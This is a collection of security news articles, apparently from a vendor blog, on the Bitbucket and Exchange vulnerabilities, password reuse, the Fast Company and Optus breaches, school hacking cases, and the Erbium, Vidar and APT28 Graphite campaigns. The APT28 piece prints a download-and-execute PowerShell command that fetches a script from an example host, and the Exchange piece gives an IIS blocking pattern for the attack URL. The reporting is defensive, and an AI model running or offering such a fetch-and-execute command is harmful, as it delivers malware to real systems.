IT NEWS

On September 29, 2022 the Cybersecurity & Infrastructure Security Agency (CISA) added three vulnerabilities to the catalog of known to be exploited vulnerabilities. One of them is a vulnerability in Atlassian’s Bitbucket Server and Data Center. The other two are the Exchange Server zero-day vulnerabilities we wrote about last week.

The Bitbucket vulnerability is no zero-day. Fixed versions were made available on August 24, 2022. The vulnerability allows an attacker who has read permissions to execute arbitrary code by sending a malicious HTTP request.

Mitigation

All versions of Bitbucket Server and Datacenter released after 6.10.17 including 7.0.0 and newer are affected. Atlassian recommends that you upgrade your instance to one of the versions listed below.

You can download the latest version of Bitbucket from the download center. Visit the Frequently Asked Questions (FAQ) page if you have any questions.

If, for any reason, you are unable to apply the security updates, you are advised to apply temporary partial mitigation by turning off public repositories by setting the option feature.public.access to false. This blocks unauthorized users from accessing the repository.

If you access Bitbucket via a bitbucket.org domain, it is hosted by Atlassian and you are not affected by the vulnerability.

Vulnerability

The Remote Code Execution vulnerability was found by Maxwell Garret a security researcher at  Assetnote and assigned CVE-2022-36804. The vulnerability was rated as critical, which indicates a CVSS score between 9 and 10 out of 10. If an attacker can read the content of a repository, either because it is a public repository or because they have read permission on a private repository, they are able to exploit the vulnerability.

Discovery

Bitbucket is a web based hosting service that distributes source code and development projects. Typically, Bitbucket Server is deployed on-premise and allows uploads of source code from GitHub and other platforms. Bitbucket uses git for many operations within the software. The discovery was inspired by the blog post from William Bowling about his RCE via git option injection in GitHub Enterprise.

Exploitation

The proof-of-concept (PoC) exploit was made public on September 19, 2022. Attackers did not wait long. Some were observed scanning for vulnerable instances as early as September 20th.

Besides CISA adding the vulnerability to the known to be exploited vulnerabilities list, the Belgian federal cyber emergency team (CERT.be) warned that an exploit kit is now available for CVE-2022-36804 and urged users to patch.

WARNING: An exploit kit is now available for CVE-2022-36804 affecting @Atlassian @Bitbucket Server and Data Center. More information on https://t.co/ccK9ng8j58
If you haven’t done so already, it’s time to #patch #patch #patch https://t.co/fytm6ZEGiw

— CERT.be (@certbe) September 27, 2022

Now that CISA has set a to-be-patched date of October 21, 2022 this will put the vulnerability higher on the agenda for US Federal Civilian Executive Branch Agencies (FCEB) agencies. As always, all other organizations are under advice to patch urgently if they haven’t already.

I have an embarrassing confession to make: I reuse passwords.

I am not proud of it, but honestly it’s a relief to finally get it off my chest. I am not a heavy re-user, nothing crazy, I use a password manager to handle most of my credentials but I still reuse the odd password from time to time.

It’s embarrassing to admit because recommending that users use unique passwords for each of their accounts is part of my job, and with good reason: Password reuse leads to credential stuffing, a form of automated attack where cybercriminals use lists of passwords stolen from one website to break into other websites. Credential stuffing attacks are large, automated, and persistent, and they are so successful that they happen almost constantly.

It seems obvious and important therefore to tell users not to reuse passwords. But telling them to stop doesn’t work and it never has. It doesn’t even work on me.

Why not?

I believe the reason is that for years we’ve been misdiagnosing the problem we thought we were solving. Consequently, we treated password reuse as a form of misbehavior that could be corrected rather than seeing it for what it is—a rational response to an impossible situation.

As computer and internet use exploded over the past forty years, the number of passwords each of us must remember has climbed precipitously.

The companies that make password managers are in broad agreement that we’re currently averaging a little less than 100 passwords each. Dashlane said its users have about 90 passwords; NordPass puts the figure at 70-80; and LastPass says it’s 85 passwords for employees of SMBs, and 25 passwords for people working in enterprises.

Me? I’ve got 742, and I’ve used 200 in the past year.

It simply isn’t possible to remember that many passwords, and the number of passwords we need to know probably exceeded the number we can remember decades ago.

In 2012, a group of researchers gave us a big clue about how small our capacity for remembering passwords is by looking at how often users forgot theirs, or got them mixed up. 84 percent of users with 7-9 passwords reported problems, and there was a precipitous decline in recall between users remembering 1-3 passwords and those remembering 4-6.

The sense that we can, at best, remember just a handful of passwords is reinforced by more research from 2018. In this study the participants had just 13 accounts each. Despite this relatively modest number, 91 percent resorted to password reuse, choosing to service their accounts with an average of 5.8 passwords each.

It was a snapshot of what had happened everywhere.

In the face of an ever-growing gap between the number of accounts and the number of passwords they could remember, users did the only things that made sense: They made their passwords weaker, so they were easier to remember; they wrote them down; and they reused them.

The collective response of the security community was to tell them to STOP: Don’t write them down; stop making them simpler; stop reusing them; and by the way please make every password a mixture of no fewer then fourteen uppercase, lowercase and wacky characters; oh, and please change your impossibly complex password for a different impossibly complex password as often as you change your underwear.

We should not have been surprised when we were completely ignored.

Nevertheless, we persisted for years. Some of the advice got better, but the bits about making strong passwords and not reusing them didn’t change even though password reuse remained endemic, and every data breach brought further evidence that users remain firmly wedded to very bad password choices.

Several years ago, experts at Microsoft Research and Carleton University, Canada did the math that explains what’s going on.

According to their calculations, a conscientious user with 100 unique, random passwords would have to perform an impossible feat of memory—the equivalent of remembering 1,362 random digits, a task that “far exceeds what users can manage by memorization”. You don’t say.

Many users’ first instinct is make their passwords easier to remember, which makes them less secure. It helps, a bit, but it doesn’t come close to turning a 100-password portfolio into something a normal human can manage.

One of the “Eureka” moments in the research is that users don’t just have to remember their passwords, they have to remember which password goes with which account. Just that task alone is more difficult than remembering the order of a shuffled card deck.

No amount of weakening your passwords can overcome that. The only strategies that work are writing passwords down or reusing them.

One weird trick to improve your passwords

You may be reading this thinking that the answer to all of this is to use a password manager—a piece of software that can generate strong passwords and remember them for you.

Password managers are a potential answer to this problem, and advocating for them has been an important piece of security advice for several years now. However, despite all that advocacy only about 20% of us use one and almost half of us still don’t know what a password manager is. Teaching users to be better users is a long game.

More worryingly, buried deep within a 2016 password reuse study is the startling conclusion (with some caveats) that “third-party password managers do not significantly reduce password re-use across websites.” This probably requires more study, but from a personal perspective I can say that having a password manager has certainly helped my reuse problem, although it has not eliminated it.

But that isn’t password managers’ only trick: They can still generate strong passwords, and that’s good, right? Yes, it is, but we may have been seriously overestimating the importance of them.

In 2019, Microsoft’s Alex Weinert wrote that “When it comes to composition and length, your password (mostly) doesn’t matter.” And he’s not alone in believing that. Password strength just isn’t a factor that affects your security most of the time.

A strong password won’t protect you from a credential stuffing attack, phishing, or keylogging malware, for example.

Avoiding the most common form of attack—password spraying—where attackers use very short lists of very common passwords against lots of targets, requires only that you don’t use one of the 50 worst possible passwords (things like qwerty and 123456). You can have a very bad password indeed and still be safe from everything I’ve mentioned above. A modest password of just six characters or so will protect you from almost any kind of brute force attack conducted across the internet.

The only situation where password strength really matters is in an offline brute force attack where an attacker uses specialist hardware to crack the contents of a stolen password database. These attacks are very rare, but they are the reason you are asked to concoct 14-character masterpieces of uppercase, lowercase and wacky characters.

Solving the difficult edge case of offline password cracking by demanding all users create vastly more complex passwords than they otherwise need, either in their own head or with a password manager, seems like tilting at windmills. Defending against determined and well-resourced adversaries is a job for experts. We should be taking on the burden of defending against these attacks with better password management and storage rather than by demanding better users.

We need to stop and think about all the things we’re asking users to do. The more rules we offer, the less likely people are to follow any them. And the more rules we offer that subsequently turn out to be counterproductive, such as demanding regular password resets, or valuing special characters over adding more characters, the more credibility we burn.

If we’re going to spend time advocating for a change in behaviour, we should probably pick one thing. And there is something that can make an enormous difference to password security, without users needing to worry about what passwords they use, where they store them and how often they use them: Multi-factor authentication (MFA).

The simple act of having to type in a code from an app alongside your password is a game changer—it kills credential stuffing, password spraying and brute force attacks stone dead.

Weinert: “Based on our studies, your account is more than 99.9% less likely to be compromised if you use MFA.”

Even better, while we can advocate for users adopting MFA where it’s available, we aren’t reliant on them listening. The most important thing is to persuade organizations, or better yet groups of organizations or even legislators, that it’s important. When that happens, users are just along for the ride.

So, from now on, my password advice is this: If you have time and energy to spare, find somewhere you’re not using MFA and set it up. If you do I promise never to nag you about how weak your passwords are or how often you reuse them ever again.

Microsoft has issued some customer guidance as it investigates (yes, more) reported vulnerabilities in Microsoft Exchange Server, affecting the 2013, 2016, and 2019 versions of the software. The company says it “is aware of limited targeted attacks using the two vulnerabilities to get into users’ systems.” The move follows discussion online about whether two new Exchange zero-days are really new vulnerabilities, or just new exploits for known vulnerabilities.

So, let’s start with the most important part: What should you do if you’re tasked with administering an Exchange Server? Microsoft is working on an accelerated timeline to release a fix. In the meantime it’s providing mitigations and detection guidance:

Microsoft Exchange Online Customers do not need to take any action.

Users of the on premises product should add a blocking rule in IIS Manager to block the known attack patterns. According to Microsoft, the following URL Rewrite instructions, which are currently being discussed publicly, are successful in breaking current attack chains:

• Open the IIS Manager.
• Expand the Default Web Site.
• Select Autodiscover.
• In the Feature View, click URL Rewrite.
• In the Actions pane on the right-hand side, click Add Rules. 
• Select Request Blocking and click OK.
• Add String .*autodiscover.json.*@.*Powershell.* and click OK.
• Expand the rule and select the rule with the Pattern .*autodiscover.json.*@.*Powershell.* and click Edit under Conditions.
• Change the condition input from {URL} to {REQUEST_URI}

The instructions above can be found on the Microsoft blog, with screenshots. It adds that there is no known impact to Exchange functionality if the URL Rewrite module is installed as recommended.

Another option is to block the ports that are used for Remote PowerShell—HTTP: 5985 and HTTPS: 5986.

The vulnerabilities

The vulnerabilities were discovered by GTSC while performing security monitoring and incident response services. It was able to assess that the attacks were based on exploit requests with the same format as ProxyShell. But the servers being attacked had all the latest updates, including those that stop ProxyShell.

The attacks were used to drop web shells on the Exchange servers—a script that can be used by an attacker to run remote commands and maintain persistent access on an already compromised computer.

According to security researcher Kevin Beaumont a significant number of Exchange servers has been backdoored. But he adds that this is not unusual, since the patching process is apparently such a mess that people end up on old Content Updates and don’t patch ProxyShell properly.

On his blog on the subject he points out that if you don’t run Microsoft Exchange on premise, and don’t have Outlook Web App (OWA) facing the internet, you are not impacted either. In addition, Microsoft also notes that attackers need authenticated access to the vulnerable Exchange Server in order to exploit either of the two vulnerabilities associated with these attacks.

The vulnerabilities, which are chained together, are:

CVE-2022-41040, a Server-Side Request Forgery (SSRF) vulnerability. SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make requests to other services within an organization’s infrastructure.

CVE-2022-41082, a vulnerability that allows remote code execution (RCE) when PowerShell is accessible to the attacker.

Yesterday, Apple News announced it had disabled the channel of Fast Company, a US-based business magazine, after surprised Twitter users reported it was tweeting offensive comments.

An incredibly offensive alert was sent by Fast Company, which has been hacked. Apple News has disabled their channel.

— Apple News (@AppleNews) September 28, 2022

Fast Company was hacked on Sunday, September 25. The attacker responsible modified article titles to obscene and racist things:

“Hacked by Vinny Troia. [redacted] tongue my [redacted]”, one title read.

This is what Fast Company looked like after it was hacked by an actor named “Thrax.”

Fast Company took its site offline to fix the defacement but the hacker successfully got in again on Tuesday via content management system WordPress, in order to push the same offensive text to its followers on Apple News.

Fast Company tweeted on Wednesday:

Fast Company’s Apple News account was hacked on Tuesday evening. Two obscene and racist push notifications were sent about a minute apart.

The messages are vile and not in line with the content and ethos of Fast Company. (continued below)

— Fast Company (@FastCompany) September 28, 2022

On Thursday, Fast Company’s website was displaying a statement regarding the hack on a black background.

“The messages are vile and are not in line with the content and ethos of Fast Company.”

While the company is working to resolve what happened, it said it will continue publishing stories on its social channels, including Facebook, LinkedIn, and TikTok.

Speaking with BleepingComputer, “Thrax” revealed how they hacked Fast Company’s website.

Thrax claimed they infiltrated Fast Company after bypassing basic HTTP authentication that secured the WordPress instance the company uses for their website. They then used a default password in “dozens” of accounts to take control of the CMS.

They then stole Auth0 tokens, Apple News API keys, and Amazon SES secrets. Using the tokens, “Thrax” says they created admin accounts on the CMS systems, which were then used to push out the notifications to Apple News.

Since Australian telecoms company Optus disclosed a security breach on September 22, 2022, a lot has been happening.

Much of it reads like a movie script.

Prologue

A hacker acting under the pseudonym “optusdata” claims to have stolen the data of 10 million Optus customers. The information included home addresses, drivers’ licenses, Medicare numbers, and passport numbers. No passwords or financial details have been compromised.

Optus disclosed the breach on a dedicated page on its website. According to Kelly Bayer Rosmarin, Optus’ CEO:

“We are devastated to discover that we have been subject to a cyberattack that has resulted in the disclosure of our customers’ personal information to someone who shouldn’t see it.”

At this point we don’t know what exactly happened, but as always there are some interesting theories about it.

Optus says it has sent an email or SMS message to all the customers whose identification document numbers, such as driver’s license or passport number, were compromised as a result of the cyberattack.

Extortion

On an online forum, optusdata threatened to publish the data of 10,000 Optus customers per day unless they received $1 million in cryptocurrency. They began by posting the data of 10,200 customers.

In a definitely related activity, but probably not by the same threat actor, victims of the data breach have also started to receive text messages saying they must pay AUD 2,000 ($1,300) within two days or their data will be sold on for “fraudulent activity”. While the texts include the name “OptusData” it is probably not the same person, and more likely to be someone who has just gained access to the partial dataset that the original threat actor leaked.

Too much attention

The Australian Federal Police in cooperation with the FBI and other law enforcement organizations are investigating the data breach, and have launched Operation Hurricane.

We are aware of reports of stolen data being sold on the dark web and that is why the AFP is monitoring the dark web using a range of specialist capabilities. Criminals, who use pseudonyms and anonymizing technology, can’t see us but I can tell you that we can see them.

Apparently the heat has grown beyond what the threat actor could bear. In a statement on a forum where they announced the hack, they wrote:

“Too many eyes. We will not sale data to anyone. We cant if we even want to: personally deleted data from drive (Only copy)

Sorry too 10.200 Australian whos data was leaked.

Australia will see no gain in fraud, this can be monitored. Maybe for 10.200 Australian but rest of population no. Very sorry to you.

Deepest apology to Optus for this. Hope all goes well from this

Optus if your reading we would have reported exploit if you had method to contact. No security mail, no bug bountys, no way too message.

Ransom not payed but we dont care any more. Was mistake to scrape publish data in first place.”

Note: I left the typos alone since it may give an expert some clues about the writers’ first language

Happy end?

Let’s start with the good news.

Australian victims of the Optus breach will be able to change their driver’s license numbers and get new cards. The New South Wales, Victoria, Queensland, and South Australia governments have started clearing bureaucratic hurdles for anyone who can prove they are victims of the hack. Optus is expected to bear the multimillion-dollar cost of the changeover.

There is also talk about a class action lawsuit.

Optus is offering customers the option to take up a 12-month subscription to a credit monitoring and identity protection service.

The Commonwealth Bank confirmed it had identified and blocked the account of the SMS extortionist.

All the customers who have an unexpired Medicare card will be contacted by Optus. There are a further 22,000 expired Medicare card numbers that were exposed, and the holders of those cards will also be contacted directly. It’s worth noting that Optus says personal information cannot be accessed using just a Medicare number.

The bad news is, of course, in the uncertainty. Can we really trust the threat actor when they claim they have deleted the data? They have proven to be a criminal so why would we take their word for it? We can’t even be hundred percent sure that the person posting that statement is the actual holder of the data.

So, stay safe and be on the lookout for the phishing campaigns that will undoubtedly try to bank on these events.

We will keep you updated here if the plot decides to take another turn.

It seems like not a day goes by where we don’t hear about a local government cyberattack. Indeed, from 911 call centers to public schools, cyberattacks on local governments are as common as they are devastating. 

Just how often do threat actors attack local governments? A survey of 14 mainly larger US local governments found that just over half of respondents said they suffer attacks constantly, more than a quarter said hourly, and 14.3% said daily. 

Local governments continue to be a common cyberattack target for two big reasons. The first is that they handle troves of sensitive data, especially personally identifiable information (PII), and the second is that they operate on shoestring budgets with little to no cybersecurity staff or leadership buy-in. 

Now, factor in these two reasons with the sheer number of local governments out there in the United States—90,075 units—and you have a huge, vulnerable, and valuable target. Sounds like easy pickings for attackers, but it doesn’t have to be. 

With a few best practices, local governments can improve their cybersecurity posture and make it less likely that threat actors attack their systems. We’ll break down five best practices for local government cybersecurity in this post.

Table of Contents

1. Take cybersecurity assessments to find and address weaknesses

2. Adopt the fundamentals

3. Partner up!

4. Build a playbook for ransomware response and recovery

5. Consider outsourcing

1. Take cybersecurity assessments to find and address weaknesses

Cybersecurity consultants and the professional literature agree: You should adopt cybersecurity policies such as the NIST Framework to help prevent and respond to attacks. And a key part of building out any cybersecurity policy for your local government is to develop an organizational understanding of risk to systems, people, data, and so on. 

There are tons of free cybersecurity assessments for Federal, State, Local, Tribal and Territorial (SLTT) governments that you can take to get started. After performing the assessments, you can compare your results to the criteria of NIST to identify gaps, as well as deficiencies to be improved.

1. Cyber Infrastructure Survey (CIS): A free assessment of essential cybersecurity practices in-place for critical services. Also conducted by the DHS.
2. Cyber Resilience Review (CRR): The CRR assessment evaluates your organization’s operational resilience and cybersecurity practices. Conducted free of charge by the US Department of Homeland Security (DHS)
3. Phishing Campaign Assessment (PCA): Evaluates an organization’s susceptibility and reaction to phishing emails. Conducted free of charge by the National Cybersecurity Assessments and Technical Services (NCATS) team.
4. Cybersecurity Evaluation Tool (CSET®): A stand-alone desktop application that guides asset owners evaluate their cybersecurity posture against recognized standards. Also delivered free of charge by the NCATS team.
5. Risk and Vulnerability Assessment (RVA) One-on-one engagement to give organizations an actionable risk analysis report containing remediation recommendations prioritized by severity and risk.

2. Adopt the fundamentals  

The unfortunate reality is that an inability to pay competitive salaries, insufficient number of staff, and lack of funds are big barriers to local government cybersecurity. However, there’s still plenty of important cybersecurity fundamentals that local governments should try to adopt to the fullest extent possible. 

Take cyber insurance, for example. Cyber insurance can prevent local governments from having to pay huge out of pocket costs in the event that they’re hit with a cyberattack. Baltimore learned this the hard way. 

(An important caveat here is that cyber insurance is becoming increasingly expensive: check out our article on 4 ways to save money on cyber insurance).

Cybersecurity best practices don’t just help you stay safe—they can also make you eligible for grant funding. In particular, local governments looking to be eligible for the State and Local Cybersecurity Grant Program must include these best practices in their cybersecurity plan:

1. Multi-factor authentication (MFA)
2. Enhanced logging
3. Data encryption for data at rest and in transit
4. End use of unsupported/end of life software and hardware that are accessible from the Internet 
5. Prohibit use of known/fixed/default passwords and credentials 

In addition, only 23% of local governments have adopted the .gov domain, meaning a majority of local governments are missing out on one of the simplest ways to strengthen their cybersecurity posture. Sponsored by CISA, the Cybersecurity and Infrastructure Security Agency, the .gov domain comes with several key security benefits:

• MFA is enforced on all accounts in the .gov registrar, and user accounts cannot use passwords that have been found in known data breaches.
• It ‘preloads’ all new domains, which lets web browsers know to always use HTTPS to connect with any website on that domain.
• CISA, GSA, and the National Institute of Standards and Technology (NIST) help monitor for issues in the namespace

To obtain a .gov domain or to learn more, check out some of the resources below. 

• https://home.dotgov.gov/registration. 

• https://home.dotgov.gov/registration/requirements/ 

• https://home.dotgov.gov/help/ 

3. Partner up!

Local governments may be resource-constrained, but the good news is that they don’t have to face cybersecurity alone. State governments, together with Federal, university, and even nonprofit partners, can be strong allies to local government cybersecurity.

• Federal partners: Local governments are encouraged to report cyber incidents to a federal entity so they can receive relevant asset response, threat response, and threat intelligence services. Partnering with your local fusion center is a good idea as well.

• State partners: The level of state-local cybersecurity support will vary by state, but can include assessments, exercises, and consulting services. In Michigan’s Cyber Partners Program, for example, local communities receive services from a CISO-level consultant.

• University partners: Partnering with universities can help local governments get access to talent, technological insights, even real-time network security monitoring.

• Nonprofit partners: Local governments involved with the Multi-State Information Sharing & Analysis Center (MS-ISAC) get free resources for cyber threat prevention, protection, response, and recovery.

4. Build a playbook for ransomware response and recovery 

For local governments especially, a ransomware attack is a matter of ‘when’ and not ‘if’. However, they might not have the budget or staff to implement and use anti-ransomware solutions such as Endpoint Detection and Response (EDR).

Fortunately, you don’t need any fancy technology to start building a solid ransomware response and recovery plan. NIST recommends that organizations follow these steps to accelerate their recovery, among others: 

• Develop an incident recovery plan: Establish a plan that has a Cyber Incident Response Team (CIRT) with clearly identified roles, responsibilities, and contacts ahead of time, then regularly exercise that plan.

• Data backup and restoration strategy: Backups are a prime target for attackers, so keep multiple copies of your data, and make sure at least one of them is online.

• Know who you’re going to contact: Maintain an up-to-date list of internal and external stakeholders to contact in the event of an attack, which may include senior management, PR, your legal team, insurance providers, vendors, and law enforcement.

In our Ransomware Emergency Kit, you’ll find more resources your local government needs to understand threats, prevent attacks, and defend against cybercriminals.

5. Consider outsourcing

Though CISOs might be wary about having their data handled by an outside organization, many local governments rely on vendors and managed service providers (MSPs) to provide some or all of their cybersecurity operations. 

A 2020 survey of 165 municipalities found 50.9% outsourced some of their cybersecurity functions, with almost 60% citing “Lack of local skilled professionals” as a reason for outsourcing. Some of functions commonly outsourced are:

• All cybersecurity needs

• 24/7 monitoring of cyber threats

• 24/7 monitoring of Intrusion Prevention System (IPS)

• Incident response 

• Network monitoring 

• Employee security awareness training

“By working with a trusted partner or service provider, local governments can fast track to get their security stack up to par,” said David Pier, Team Lead, Corporate Solutions Engineering at Malwarebytes. “Many frameworks and security plans can take upwards of multiple years to successfully implement and audit for certification. If they can pass this work along to their partners, it circumvents the need for them to commit to a lengthy process in addition to the complexity of implementation.”

Read “Risk Considerations for Managed Service Provider Customers” from CISA for more information for local governments choosing an MSP.

Related: 

Cyber threat hunting for SMBs: How MDR can help

EDR vs MDR vs XDR – What’s the Difference?

Enhancing local government cybersecurity

A lack of funding and staff makes local government cybersecurity tough, period. 

However, if every local government implemented these five best cybersecurity practices today, they could dramatically lessen the likelihood and fallout of an attack—and increase eligibility for the State and Local Cybersecurity Grant Program while they’re at it.

Malwarebytes has ample experience providing local governments and public schools with effective, intuitive, and inclusive cyberprotection. Read the case studies below to learn more:

• City of Vidalia gains a ransomware and vulnerability-free zone
• University of Illinois turns to Malwarebytes in the search for an endpoint remediation solution
• Shaker Heights Schools uses Malwarebytes to help remediate ransomware infection

Check out our government case studies and education pages for more information.

For many students school can be a tough time, and we’ve all heard stories about bored or frustrated kids compromising school cybersecurity to change grades. Sometimes the students are celebrated, and other times it ends in them being expelled from school, or even prosecuted. 

Of course, these acts of compromising school security are against the law. In 1986, the Computer Fraud and Abuse Act (CFAA) was enacted as an amendment to the first federal computer fraud law, to address hacking. The CFAA prohibits intentionally accessing a computer without authorization or in excess of authorization.

And the sentences are not mild. Accessing a computer to defraud and obtain value (such as raising your grades) could end in a five-year prison sentence!

Here are four times school cybersecurity failed, and students got up to no good:

1. Rickrolling an entire school district

A student at a high school in Cook County successfully hacked into the Internet-of-Things (IoT) devices of one of the largest school districts in Illinois, and gave everyone a surprise.

In a personal blog the student wrote:

“I did it by hijacking every networked display in every school to broadcast ‘Never Gonna Give You Up’ in perfect synchronization. Whether it was a TV in a hall, a projector in a classroom, or a jumbotron displaying the lunch menu, as long as it was networked, I hacked it!”

Now, that is high-level rickrolling! And he was lucky enough to find an understanding audience. The director stated that because of its guidelines and documentation, the district would not be pursuing discipline. In fact, they thanked the rickroller for their findings and asked them to present a debrief to the tech team.

2. Guilty until proven innocent

A Canadian student at Tufts University veterinarian school was expelled for an elaborate months-long scheme involving stealing and using university logins to break into the student records system, view answers, and alter her own and other students’ grades.

Since her visa was no longer valid after she got expelled, she had to leave the US immediately. With tens of thousands of dollars in student debt and no prospect of her becoming a veterinarian, her life was in shambles. 

She provided Tufts with information about her whereabouts at the times of the alleged hacks, but her alibis were dismissed. She scanned her MacBook Air—the source of the alleged hacks—and that showed that it was itself compromised. Within minutes, several malicious files were found, chief among which were two remote access trojans (RATs).

Like any private university, Tufts can discipline and expel a student for almost any reason. So they did not have to prove she was guilty, she had to prove without any reasonable doubt that she was innocent, and she was unable to convince them.

3. 12-year-olds pwn their school district

The hack started small, in seventh grade, when the students bypassed their middle school’s internet filters to watch YouTube during lunch. But by the time Jeremy Currier and Seth Stephens were caught more than two years later, their exploits had given them extraordinary reach into the computer network of the Rochester Community Schools. They literally had access to everything. The boys were even using district servers to mine for cryptocurrency.

As a consequence, the district expelled both of them, then referred them to the county sheriff’s office. Their long-term employment prospects should have been bright, with many organizations looking for skilled cybersecurity workers. Sadly, the boys are unlikely to be eligible for many of those public-sector positions as it’s now unlikely they will be able to pass a background check and get security clearance.

4. Homecoming queen rigs contest, allegedly

When Emily Grover was named homecoming queen, her school accused her and her vice principle mother of hacking students’ accounts to sway the election.

The pair allegedly used the mother’s login to the school computer system to harvest student IDs and birthdates. These were then used to cast 246 fake votes on Election Runner—a third-party app used by the school to run the election—from the mother’s cell phone and a computer at her home.

The duo claim to be innocent and refused a no-jail plea agreement, despite facing a maximum penalty of 16 years in jail.

Grover was forbidden from graduating with her class and received a letter from the University of Western Florida saying she was no longer welcome there.

The crime and the consequences

One thing all these cases have in common is basic security lapses at the educational institutions involved: Plaintext passwords in log files, passwords on sticky notes, and wide open networks.

But even if the door is left open, it is still illegal to enter.

Should you find such an open door, warn your IT staff about it and don’t take advantage of it. Getting caught could do a lot more damage than a bad grade or only being the runner-up in a homecoming queen contest.

There’s a new slice of malware-as-a-service doing the rounds, although its actual newness is somewhat contested. The stealer, called Erbium, was first spotted on forums back in July 2022, but it seems nobody is quite sure when it started being deployed and snagging victims. Nevertheless, it is now happily causing chaos for victims as it looks to steal a sizeable portion of data from infected machines.

A slick tool with its own fully functional dashboard, its sights are set on targets not entirely dissimilar to other data stealers. System data collection, drive enumeration, and loading processes and DLLs into memory are all tell-tale signs that bad things are afoot on the target computer.

Erbium targets multiple forms of cryptocurrency wallet, along with password managing software and two-factor authentication (2FA) data. Connections are made to Discord’s Content Delivery Network in order to potentially download more malware. According to the latest research available, it leans into that well worn tactic of plundering several forms of web browser for passwords, autofill data, and also cookies. Browsers listed include Firefox, Chrome, Pale Moon, and even email client Thunderbird gets a mention.

In fact, many of the cryptocurrency wallets targeted are browser extensions. According to Bleeping Computer, this includes iWallet, Clover Wallet, Steem Keychain, ZilPay and many more. Several cold wallets are also in the malware’s crosshairs, and to top it all off it does of course have the ability to take screenshots of the victim’s desktop.

The most recent campaign described by researchers uses well worn tricks which never seem to go out of fashion. Specifically: Malware stored on free file hosting, posing as cheats or cracks. Using free file hosting for malware storage makes it easy for its operators to set up shop somewhere else, should the malware be taken down by the hosts.

The attackers are said to make use of drive-by download techniques to spread the files—a term that covers all forms of unintended software installation, such as software installed via browser exploits, or bundled with legitimate downloads. There are no more specifics, but outside of this campaign, it is very common to see these sorts of files promoted on fake Youtube videos or even in the comments under legitimate videos.

Once enough data is gathered by the malware authors, it’s off to the underground marketplaces to trade and / or sell the stolen information. Erbium has become very popular in recent months, with Bleeping Computer reporting the cost of doing business has risen from $9 per week to $100 per month.

Competition is fierce in malware-as-a-service land, but Erbium seems to be sticking around.

Users of Malwarebytes are protected from the two payloads mentioned in the Duskrise article [1], [2], and the various payloads [1], [2] listed in the Cyfirma writeup.

Stay safe out there!

Zoom video call software continues to be a staple in work environments. Despite a slow, post-lockdown easing back to the “old normal,” many businesses still have remote workers, or people working in different geographies. It’s no surprise then to see criminals continuing to abuse Zoom’s popularity, in the hope of netting interested parties and, potentially, luring current users into downloading and installing malware.

This particular campaign, initially discovered by an Internet researcher going by the handle @idclickthat, gets unsuspecting users to download an information-stealer—spyware, if you prefer—from fake sites hosting malformed Zoom installers (malware bundled with a legitimate Zoom installer) onto their work systems.

Malware @Zoom downloads 🤖

/zoom-download.host
/zoom-download.space
/zoom-download.fun
/zoomus.host
/zoomus.tech
/zoomus.website
PDRhttps://t.co/7NJ4fEJ9Su@ULTRAFRAUD @malwrhunterteam @JAMESWT_MHT @illegalFawn @nullcookies @AlvieriD @BumbledBubble @ActorExpose pic.twitter.com/JYq2UJEMQ7

— idclickthat (@idclickthat) September 12, 2022

Further analysis from researchers at Cyble reveals this spyware is known as the Vidar Stealer, which it did a deep-dive on last year. Vidar steals user credentials, banking information, saved passwords, IP addresses, and other sensitive information. Findings reveal six fake Zoom download sites, but they are no longer accessible. According to idClickThat, the only difference between the home page of the fake Zoom download sites and the real one is the addition of a “download” button in the main image.

It isn’t clear how users encountered these fake download sites, but those that did downloaded a file called Zoom.exe. Once executed, it dropped two payloads: The legitimate software installer and malware named Decoder.exe, which then dropped Vidar malware. This spyware was then injected into MSBuild.exe, a platform used to build applications.

Once injected, Vidar extracted a command-and-control IP addresses from two profiles created on Telegram and ieji.de, an anonymous social platform based on an instance of Mastodon. These URLs, per Cyble researchers, house DLL files and configuration data the spyware needs to function.

Note that information stealers like Vidar can harvest credentials that put your business network at risk. Threat actors can sell this access to the highest bidders, who can use it to break into your company network, steal information and plant ransomware.

So, before downloading files that claim to be legitimate, it pays to do a quick online search for the software’s official website. Of course it also pays to have good security software that blocks malware, so that accidents can be stopped before they turn into a problem for your computer and your employer’s network.

Stay safe!

Researchers at Cluster25 have published research about exploit code that’s triggered when a user moves their mouse over a link in a booby-trapped PowerPoint presentation.

The code starts a PowerShell script that downloads and executes a dropper for Graphite malware.

Graphite is named after Microsoft’s Graph API, which it uses to access command and control (C2) resources on Microsoft OneDrive. This type of communication allows the malware to avoid detection for longer, because it only connects to legitimate Microsoft domains.

The attack was attributed to the Russian APT28 group, also known as Sofacy or Fancy Bear, a notorious Russian threat actor that has been active since at least 2004. Its main activity is collecting intelligence for the Russian government. The group is known to have targeted US politicians, organizations, and even nuclear facilities.

Cluster25 indicates that entities and individuals in the defense and government sectors of European countries may have been the potential targets of this campaign. But, as we always say, attribution is hard, and thinking you aren’t a target isn’t a good defense strategy.

Malicious mouseover

The technique used in this attack does not require macros to be enabled. It uses the Windows native SyncAppvPublishingServer utility, which is triggered by simply hovering over a hyperlink.

Basically, hovering over a mouse can be used to trigger:

SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://example.org/malice.ps1') | IEX"

Which downloads a script—malice.ps1 in my example—which can be used to execute malicious code on the affected system.

In the example discovered by Cluster25, the malicious link triggered a PowerShell script that downloaded a DLL file from OneDrive, disguised with a .jpeg extension. The file was later decrypted and written to the local path C:ProgramDatalmapi2.dll. The script also added a registry key to execute the DLL via rundll32.exe for persistence.

The victim does not need administrator access to trigger a successful attack. This technique is by no means new—it was spotted spreading malware five years ago, in 2017.

Mitigation

SyncAppvPublishingServer has no business running unless the Application Virtualization (App-V) for Windows client is active on the system. App-V delivers Win32 applications to users as virtual applications, which are installed on centrally managed servers and delivered as a service in real time, on an as-needed basis. Users launch and interact with virtual applications as if they are installed locally.

So, unless you are using this functionality, it is safe to block SyncAppvPublishingServer.exe. Also, Microsoft Office’s Protected View should stop the code from executing. Protected View is enabled by default and should not be disabled. You can check this by opening an Office file and clicking on File > Options, then Trust Center > Trust Center Settings > Protected View to view the active settings.

Malwarebytes

Malwarebytes users are protected against this attack.

Our web protection module blocks the One Drive URLs and our Real-time Protection module detects lmapi2.dll as Trojan.Downloader.